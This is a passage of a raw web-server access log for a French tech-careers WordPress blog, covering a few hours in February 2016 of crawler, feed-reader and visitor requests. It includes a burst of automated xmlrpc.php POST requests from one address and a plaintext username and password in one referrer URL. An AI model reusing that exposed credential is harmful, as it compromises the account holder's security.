/wp-content/uploads/2015/03/Photo-Bio-2013-300x225.jpg HTTP/1.1\" 200 18764 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n197.253.4.10 - - [07/Feb/2016:23:46:17 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x225.jpg HTTP/1.1\" 200 32895 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n197.253.4.10 - - [07/Feb/2016:23:46:17 -0800] \"GET /wp-content/uploads/2015/02/3152875867_148b09f57d_z-300x225.jpg HTTP/1.1\" 200 9568 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n197.253.4.10 - - [07/Feb/2016:23:46:18 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n197.253.4.10 - - [07/Feb/2016:23:46:18 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n141.8.184.15 - - [07/Feb/2016:23:48:42 -0800] \"GET /robots.txt HTTP/1.1\" 200 383 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n130.193.51.3 - - [07/Feb/2016:23:48:48 -0800] \"GET /category/canada/ HTTP/1.1\" 200 5229 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.38 - - [07/Feb/2016:23:48:53 -0800] \"GET /category/europe/ HTTP/1.1\" 200 7368 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.98 - - [07/Feb/2016:23:48:59 -0800] \"GET /category/la-rubrique-de-philippe-jeudy/ HTTP/1.1\" 200 6861 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.98 - - [07/Feb/2016:23:49:04 -0800] \"GET /category/how-to/ HTTP/1.1\" 200 6081 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.98 - - [07/Feb/2016:23:49:09 -0800] \"GET /category/usa/ HTTP/1.1\" 200 7479 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n92.103.168.238 - - [07/Feb/2016:23:49:14 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n92.103.168.238 - - [07/Feb/2016:23:49:14 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n92.103.168.238 - - [07/Feb/2016:23:49:14 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n92.103.168.238 - - [07/Feb/2016:23:49:14 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33587 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n92.103.168.238 - - [07/Feb/2016:23:49:14 -0800] \"GET /wp-content/uploads/2015/02/tumblr_inline_nixmj1dBlt1sygmpd-50x50.jpg HTTP/1.1\" 200 2351 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n92.103.168.238 - - [07/Feb/2016:23:49:14 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n141.8.132.38 - - [07/Feb/2016:23:49:14 -0800] \"GET /category/usa/ HTTP/1.1\" 200 7479 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n199.16.156.126 - - [07/Feb/2016:23:49:15 -0800] \"GET /robots.txt HTTP/1.1\" 200 367 \"-\" \"Twitterbot/1.0\"\n5.255.253.78 - - [07/Feb/2016:23:49:17 -0800] \"GET /category/la-rubrique-de-philippe-jeudy/ HTTP/1.1\" 200 6861 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n62.210.250.66 - - [07/Feb/2016:23:51:52 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n193.49.247.169 - - [07/Feb/2016:23:57:31 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37378 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0\"\n193.49.247.169 - - [07/Feb/2016:23:57:31 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203836 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0\"\n198.58.102.158 - - [08/Feb/2016:00:03:50 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n2.1.72.179 - - [08/Feb/2016:00:06:15 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n91.103.43.50 - - [08/Feb/2016:00:17:05 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 304 212 \"-\" \"Mozilla/4.0 (compatible;)\"\n93.21.77.54 - - [08/Feb/2016:00:24:07 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n93.21.77.54 - - [08/Feb/2016:00:24:07 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n93.21.77.54 - - [08/Feb/2016:00:24:07 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n93.21.77.54 - - [08/Feb/2016:00:24:07 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n93.21.77.54 - - [08/Feb/2016:00:24:07 -0800] \"GET /wp-content/uploads/2014/09/logo-transparent-horizontal-1024x482.png HTTP/1.1\" 200 334990 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n93.21.77.54 - - [08/Feb/2016:00:24:08 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n93.21.77.54 - - [08/Feb/2016:00:24:08 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n80.13.10.184 - - [08/Feb/2016:00:26:40 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15483 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n80.13.10.184 - - [08/Feb/2016:00:26:52 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n80.13.10.184 - - [08/Feb/2016:00:26:54 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n198.58.103.102 - - [08/Feb/2016:00:36:08 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n198.58.102.49 - - [08/Feb/2016:00:44:14 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n91.194.84.106 - - [08/Feb/2016:00:49:31 -0800] \"GET /robots.txt HTTP/1.0\" 200 346 \"-\" \"Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)\"\n199.119.124.44 - - [08/Feb/2016:00:49:42 -0800] \"GET /feed/ HTTP/1.1\" 200 20931 \"-\" \"Mozilla/5.0 (compatible; theoldreader.com; 1 subscribers; feed-id=cab69af8d42b04c85d91e979)\"\n122.169.127.89 - - [08/Feb/2016:00:50:53 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n88.187.8.139 - - [08/Feb/2016:00:51:18 -0800] \"GET /adrien-duermael-pixowl-et-lindustrie/ HTTP/1.1\" 200 9317 \"https://www.google.fr\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n88.187.8.139 - - [08/Feb/2016:00:51:19 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n88.187.8.139 - - [08/Feb/2016:00:51:19 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n88.187.8.139 - - [08/Feb/2016:00:51:19 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n88.187.8.139 - - [08/Feb/2016:00:51:19 -0800] \"GET /wp-content/uploads/2014/06/tumblr_inline_n6kfddJqSP1sa6hof-50x50.jpg HTTP/1.1\" 200 2773 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n88.187.8.139 - - [08/Feb/2016:00:51:20 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n88.187.8.139 - - [08/Feb/2016:00:51:21 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n88.187.8.139 - - [08/Feb/2016:00:51:29 -0800] \"GET /marie-amelie-frere-la-serial-entrepreneure-a/ HTTP/1.1\" 200 9912 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n122.169.127.89 - - [08/Feb/2016:00:51:42 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:52:00 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 629 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:52:14 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:52:24 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:52:41 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:52:57 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:53:09 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:53:23 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:53:38 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:53:52 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:54:04 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:54:17 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:54:30 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:54:46 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:55:01 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:55:17 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:55:32 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:55:46 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:56:04 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:56:16 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:56:29 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 629 \"-\" \"-\"\n66.249.64.132 - - [08/Feb/2016:00:56:44 -0800] \"GET /xavier-mouton-dubosc-le-developpeur-aux-mille/ HTTP/1.1\" 200 10049 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n122.169.127.89 - - [08/Feb/2016:00:56:54 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:57:11 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n122.169.127.89 - - [08/Feb/2016:00:57:27 -0800] \"POST /xmlrpc.php HTTP/1.0\" 200 55199 \"-\" \"-\"\n62.210.142.23 - jez [08/Feb/2016:01:06:19 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n92.222.20.166 - - [08/Feb/2016:01:10:14 -0800] \"GET /rss HTTP/1.1\" 304 163 \"-\" \"Tiny Tiny RSS/16.1 (c352248) (http://tt-rss.org/)\"\n91.103.43.50 - - [08/Feb/2016:01:16:29 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 304 188 \"-\" \"Mozilla/4.0 (compatible;)\"\n148.66.108.167 - - [08/Feb/2016:01:24:01 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n148.66.108.167 - - [08/Feb/2016:01:24:14 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n146.185.234.48 - - [08/Feb/2016:01:26:53 -0800] \"GET /liam-boogar-co-fondateur-et-ceo-rude-baguette/ HTTP/1.1\" 200 31264 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"\n146.185.234.48 - - [08/Feb/2016:01:27:00 -0800] \"GET /category/how-to/ HTTP/1.1\" 200 25303 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"\n146.185.234.48 - - [08/Feb/2016:01:27:06 -0800] \"GET /category/canada/ HTTP/1.1\" 200 16838 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"\n146.185.234.48 - - [08/Feb/2016:01:27:20 -0800] \"GET /2015/01/ HTTP/1.1\" 200 19821 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"\n146.185.234.48 - - [08/Feb/2016:01:27:29 -0800] \"GET /2014/09/ HTTP/1.1\" 200 21675 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"\n146.185.234.48 - - [08/Feb/2016:01:27:49 -0800] \"GET /2014/05/ HTTP/1.1\" 200 23145 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"\n144.76.80.55 - - [08/Feb/2016:01:31:15 -0800] \"HEAD /site.zip HTTP/1.1\" 404 348 \"-\" \"Go-http-client/1.1\"\n50.116.30.23 - - [08/Feb/2016:01:33:31 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n185.82.148.10 - - [08/Feb/2016:01:40:59 -0800] \"GET /feed/ HTTP/1.1\" 200 63896 \"-\" \"Scoop\"\n195.154.179.93 - - [08/Feb/2016:01:40:59 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:01:40:59 -0800] \"GET /wp-content/uploads/2014/05/tumblr_inline_n5cg5zlThJ1sa6hof-50x50.jpg HTTP/1.1\" 200 2073 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:01:41:00 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:01:40:59 -0800] \"GET /wp-content/uploads/2015/06/sylvia.png HTTP/1.1\" 200 803659 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:01:41:02 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:01:41:02 -0800] \"GET /wp-content/uploads/2014/08/tumblr_inline_naj6huWLqb1sa6hof-50x50.jpg HTTP/1.1\" 200 2457 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:01:41:02 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:03 -0800] \"GET /le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/ HTTP/1.1\" 200 9688 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:04 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:04 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:04 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:06 -0800] \"GET /ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/ HTTP/1.1\" 200 9099 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:06 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:06 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:06 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:01:41:07 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:01:41:07 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:01:41:07 -0800] \"GET /wp-content/uploads/2015/03/teresa-colombi.png HTTP/1.1\" 200 39881 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:01:41:07 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:01:41:11 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:01:41:11 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:01:41:11 -0800] \"GET /wp-content/uploads/2014/11/tumblr_inline_nffi5m5ms31spe2e1-50x50.jpg HTTP/1.1\" 200 2115 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:01:41:11 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:12 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux 